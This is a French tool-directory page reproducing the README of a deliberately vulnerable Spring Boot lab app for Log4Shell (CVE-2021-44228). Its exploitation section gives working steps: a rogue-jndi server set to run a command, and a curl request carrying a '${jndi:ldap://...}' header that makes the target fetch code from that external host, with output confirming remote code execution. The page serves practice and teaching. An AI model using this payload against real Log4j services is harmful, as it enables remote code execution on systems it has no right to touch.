Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228-poc — # Application exemple log4shell (CVE-2021-44228) | Kitploit
Outils/GitHubGitHub/kadantte/cve-2021-44228-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubkadantte/cve-2021-44228-poc

CVE-2021-44228-poc

# Application exemple log4shell (CVE-2021-44228)

Voir le dépôt
43il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exemple d'application vulnérable Log4Shell (CVE-2021-44228)

Il s'agit d'une application vulnérable presque copie/similaire à https://github.com/christophetd/log4shell-vulnerable-app

Les principales différences sont l'utilisation de Maven au lieu de Gradle, et l'utilisation de rogue-jndi.

Ce dépôt contient une application web Spring Boot avec Maven vulnérable à CVE-2021-44228, surnommée Log4Shell.

Elle utilise Log4j 2.6.1 et la version JDK 1.8.0_181.

Exécution de l'application Spring Boot

Construisez et exécutez l'application Spring Boot Docker :

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

Exploitation

  1. git clone https://github.com/veracode-research/rogue-jndi
  2. cd rogue-jndi
  3. mvn package
  • java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"
  • Ouvrez un deuxième terminal

    1. curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'

    Où dans les deux cas 192.168.1.x est votre adresse IP

    REMARQUE : n'utilisez pas localhost, utilisez votre adresse IP privée réelle.

    Vérifiez maintenant si l'exécution de code à distance (RCE) a réussi :

    root@kitploit:~
    $ docker ps                                 
    CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
    04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
    
    root@kitploit:~
    $ docker container exec -it 04536dbd1dff ash
    /opt/app # ls /tmp
    hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
    test_if_rce                              tomcat.8080.1707298461175346507
    

    Comme vous pouvez le voir, le fichier test_if_rce existe. Cela signifie que l'exécution de code à distance (RCE) a réussi.

    REMARQUE

    Le code et les idées ont été utilisés à partir des dépôts suivants :

    • https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod

    • https://www.lunasec.io/docs/blog/log4j-zero-day/

    • https://github.com/christophetd/log4shell-vulnerable-app

    Télécharger l’outil